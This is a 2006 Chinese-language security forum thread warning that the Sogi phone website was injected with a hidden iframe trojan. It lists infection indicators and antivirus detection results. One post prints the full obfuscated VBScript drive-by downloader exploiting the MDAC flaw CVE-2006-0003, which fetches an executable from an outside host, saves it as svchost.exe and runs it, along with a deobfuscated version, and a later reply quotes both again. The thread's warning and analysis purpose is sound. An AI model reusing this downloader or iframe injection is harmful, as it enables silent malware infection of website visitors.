手機王又被植入木馬了

第 1 頁,共 2 頁 1 2 末頁末頁
顯示結果從第 1 筆 到 10 筆,共計 12 筆
  1. #1
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    手機王又被植入木馬了

    [PHP]
    <IFRAME src="http://www.myemage.com/V20/Daren/images/***.***" width=0 height=0></IFRAME>
    [/PHP]


    會經由該網頁下載檔案svchost.exe並執行。
    但是會出現svchost.exe並不是標準的32位元應用程式,然後跟著下載2.exe
    該木馬的目的:未知
    那怎麼知道自己中標了:
    檢查C:\Documents and Settings\使用者名稱\Local Settings\Temp下是否有
    svchost.exe
    檔案大小:59.0 KB (60,468 位元組)

    檢查C:\Documents and Settings\使用者名稱\Local Settings\Temporary Internet Files下是否有

    2.exe
    檔案大小:59.0 KB (60,468 位元組)

    會在C:\WINDOWS\system32下產生
    gfile.dll、goodfile.exe 2個檔案

    ---------------------------------------------------------------------
    總之,近期上手機王的自己小心了............



    不要用人類有限的知識
      去否認這宇宙中無限的可能

  2. #2
    會員
    註冊日期
    2006-04-08
    所在地區
    ADSL 2M/256
    討論區文章
    36

    回覆: 手機王又被植入木馬了

    還好我都是用狐狸瀏覽,一步步將2.exe抓下來,卡巴6.0.1.408 2006/10/29 10:45:45 抓不到 ,但是....看圖就知道。
    附加圖片 附加圖片 noname.jpg  

  3. #3
    地平線的那端 DarkSkyline 的大頭照
    註冊日期
    2001-05-09
    所在地區
    Hinet 4M/1M
    討論區文章
    554

    回覆: 手機王又被植入木馬了

    連到 www.sogi.com.tw 會自動下載 gfile.dll 到c:\windows\system32\資料夾底下, AntiVir PersonalEdition Premium找到"HEUR/Malware"病毒,請大家測試一下自己的防毒軟體....^_^
    Dark Skyline -三分技術,七分管理-
    Ublink 客服專線:0800-555195
    Ublink -看見您對網路的需求 http://ns2.ublink.org
    網路設備的專業服務團隊 - http://www.ublink.org
    小紅傘(AVIRA AntiVir)病毒回報網址 - http://analysis.avira.com/samples/index.php

  4. #4
    會員
    註冊日期
    2005-07-03
    討論區文章
    53

    回覆: 手機王又被植入木馬了

    BitDefender Antivirus v10找到病毒
    Infected: Dropped:Generic.Lineage.06B7FB77

  5. #5
    あなたの側に居る 琥珀 的大頭照
    註冊日期
    2002-08-17
    所在地區
    中和區 / Wi-Fi
    討論區文章
    9,717
    2000 的 IE6 完全沒有反應?在 system32 和 temp 目錄沒有找到上述的檔案。


    畫冊:無盡少女 & 政宗君

  6. #6
    長期威脅研究經驗
    註冊日期
    2005-08-23
    所在地區
    ADSL 12M/1M
    討論區文章
    1,074

    回覆: 手機王又被植入木馬了

    Mcafee 的未知防禦技術可以偵測到喔~

    用FF可以防止中毒...

  7. #7
    會員 haol 的大頭照
    註冊日期
    2006-06-11
    所在地區
    ADSL 8M/512
    討論區文章
    97

    回覆: 手機王又被植入木馬了

    2.exe
    卡巴更新真快
    已偵測為Trojan-PSW.Win32.OnLineGames.as


    F-Prot 3.16f 10.28.2006 Possibly a new variant of W32/Threat-IKNP-based!Maximus

    對了f-secure不是有F-Prot的引擎嗎,當kav尚未更新時
    f-secure的f-Prot能以啟發式抓到嗎?

    f-secure的使用者能試試..........
    此文章於 2006-10-29 04:33 PM 被 haol 編輯。

  8. #8
    會員 haol 的大頭照
    註冊日期
    2006-06-11
    所在地區
    ADSL 8M/512
    討論區文章
    97

    回覆: 手機王又被植入木馬了

    f-secure "online scanner"2.1似乎不行 ........
    (f-secure的更新跟kav有時差?!> <,而f-secure的f-Pro也..........)

    此文章於 2006-10-29 04:34 PM 被 haol 編輯。

  9. #9
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    回覆: 手機王又被植入木馬了

    Microsoft Windows MDAC 漏洞 - CVE-2006-0003:

    作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
    RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
    洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬
    --------------------------------------------------------------------------
    手機王網頁木馬原始碼:
    [PHP]

    <script language="VBScript">
    on error resume next

    dl="http://www.myemage.com/V20/Daren/images/*.exe"
    j1="clsid:"
    j2="BD96"
    j3="C556-"
    j4="65A3-"
    j5="11D0-"
    j6="983A-"
    j7="00C04FC29E36"
    j8=j1&j2&j3&j4&j5&j6&j7
    xx="object"
    xxx="classid"
    xxxx="Scripting.FileSystemObject"
    dd="open"
    Set df = document.createElement(xx)
    df.setAttribute xxx, j8
    b4="Mi"
    b5="cr"
    b6="o"
    b7="soft"
    b8=".X"
    b9="M"
    b10="L"
    b11="H"
    b12="T"
    b13="T"
    b14="P"
    strb1=b4&b5&b6&b7&b8&b9
    strb2=b10&b11&b12&b13&b14
    strb=strb1&strb2
    Set x = df.CreateObject(strb,"")
    a4="A"
    a5="d"
    a6="o"
    a7="d"
    a8="b"
    a9="."
    a10="S"
    a11="t"
    a12="r"
    a13="e"
    a14="a"
    a15="m"
    strd1=a4&a5&a6&a7&a8&a9
    strd2=a10&a11&a12&a13&a14&a15
    strd=strd1&strd2
    set SS = df.createobject(strd,"")
    SS.type = 1
    f4="G"
    f5="E"
    f6="T"
    stre=f4&f5&f6
    x.Open stre, dl, False
    x.Send
    marco1="svchost.exe"
    set F = df.createobject(xxxx,"")
    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)
    SS.open
    marco1= F.BuildPath(tmp,marco1)
    SS.write x.responseBody
    SS.savetofile marco1,2
    SS.close
    z1="She"
    z2="ll.A"
    z3="ppli"
    z4="cat"
    z5="io"
    z6="n"
    zz=z1&z2&z3&z4&z5&z6
    set Q = df.createobject(zz,"")
    Q.ShellExecute marco1,"","",dd,0
    </script>

    [/PHP]

    還原:
    [PHP]
    <script language="VBScript">
    on error resume next

    dl="http://www.myemage.com/V20/Daren/images/*.exe"

    j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

    xx="object"
    xxx="classid"

    dd="open"

    Set df = document.createElement(xx)

    df.setAttribute xxx, j8

    strb="Microsoft.XMLHTTP"
    Set x = df.CreateObject(strb,"")

    strd="Adodb.Stream"
    set SS = df.createobject(strd,"")

    SS.type = 1
    stre="GET"
    x.Send

    marco1="svchost.exe"
    set F = df.createobject(xxxx,"")


    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)


    SS.open
    marco1= F.BuildPath(tmp,marco1)

    SS.write x.responseBody
    SS.close


    zz="Shell.Application"
    set Q = df.createobject(zz,"")
    Q.ShellExecute marco1,"","",dd,0


    </script>
    [/PHP]

    http://www.microsoft.com/taiwan/tech.../MS06-014.mspx
    此文章於 2006-10-29 04:54 PM 被 hcchen 編輯。

    不要用人類有限的知識
      去否認這宇宙中無限的可能

  10. #10
    會員
    註冊日期
    2006-07-04
    所在地區
     
    討論區文章
    116

    回覆: 手機王又被植入木馬了

    引用 作者:hcchen
    Microsoft Windows MDAC 漏洞 - CVE-2006-0003:

    作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
    RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
    洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬
    --------------------------------------------------------------------------
    手機王網頁木馬原始碼:
    [PHP]

    <script language="VBScript">
    on error resume next

    dl="http://www.myemage.com/V20/Daren/images/*.exe"
    j1="clsid:"
    j2="BD96"
    j3="C556-"
    j4="65A3-"
    j5="11D0-"
    j6="983A-"
    j7="00C04FC29E36"
    j8=j1&j2&j3&j4&j5&j6&j7
    xx="object"
    xxx="classid"
    xxxx="Scripting.FileSystemObject"
    dd="open"
    Set df = document.createElement(xx)
    df.setAttribute xxx, j8
    b4="Mi"
    b5="cr"
    b6="o"
    b7="soft"
    b8=".X"
    b9="M"
    b10="L"
    b11="H"
    b12="T"
    b13="T"
    b14="P"
    strb1=b4&b5&b6&b7&b8&b9
    strb2=b10&b11&b12&b13&b14
    strb=strb1&strb2
    Set x = df.CreateObject(strb,"")
    a4="A"
    a5="d"
    a6="o"
    a7="d"
    a8="b"
    a9="."
    a10="S"
    a11="t"
    a12="r"
    a13="e"
    a14="a"
    a15="m"
    strd1=a4&a5&a6&a7&a8&a9
    strd2=a10&a11&a12&a13&a14&a15
    strd=strd1&strd2
    set SS = df.createobject(strd,"")
    SS.type = 1
    f4="G"
    f5="E"
    f6="T"
    stre=f4&f5&f6
    x.Open stre, dl, False
    x.Send
    marco1="svchost.exe"
    set F = df.createobject(xxxx,"")
    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)
    SS.open
    marco1= F.BuildPath(tmp,marco1)
    SS.write x.responseBody
    SS.savetofile marco1,2
    SS.close
    z1="She"
    z2="ll.A"
    z3="ppli"
    z4="cat"
    z5="io"
    z6="n"
    zz=z1&z2&z3&z4&z5&z6
    set Q = df.createobject(zz,"")
    Q.ShellExecute marco1,"","",dd,0
    </script>

    [/PHP]

    還原:
    [PHP]
    <script language="VBScript">
    on error resume next

    dl="http://www.myemage.com/V20/Daren/images/*.exe"

    j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

    xx="object"
    xxx="classid"

    dd="open"

    Set df = document.createElement(xx)

    df.setAttribute xxx, j8

    strb="Microsoft.XMLHTTP"
    Set x = df.CreateObject(strb,"")

    strd="Adodb.Stream"
    set SS = df.createobject(strd,"")

    SS.type = 1
    stre="GET"
    x.Send

    marco1="svchost.exe"
    set F = df.createobject(xxxx,"")


    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)


    SS.open
    marco1= F.BuildPath(tmp,marco1)

    SS.write x.responseBody
    SS.close


    zz="Shell.Application"
    set Q = df.createobject(zz,"")
    Q.ShellExecute marco1,"","",dd,0


    </script>
    [/PHP]
    怎麽才能做到還原的?



類似的主題

  1. 【求助】論壇被植入木馬病毒
    作者:eva671117 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 24
    最後發表: 2007-04-27, 10:15 PM
  2. 【警告】手機王網頁又被植入惡意連結
    作者:sai7sai 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 16
    最後發表: 2007-02-24, 10:15 PM
  3. 【警告】Sogi! 手機王--被植入木馬
    作者:hcchen 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 9
    最後發表: 2006-10-29, 11:45 AM
  4. 這網站是不是被植入木馬了啊>.<
    作者:消防小天使 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 1
    最後發表: 2005-06-19, 10:25 PM
  5. 這是被植入木馬嗎?
    作者:chiener 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 0
    最後發表: 2002-04-23, 04:23 PM

 

手機王

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •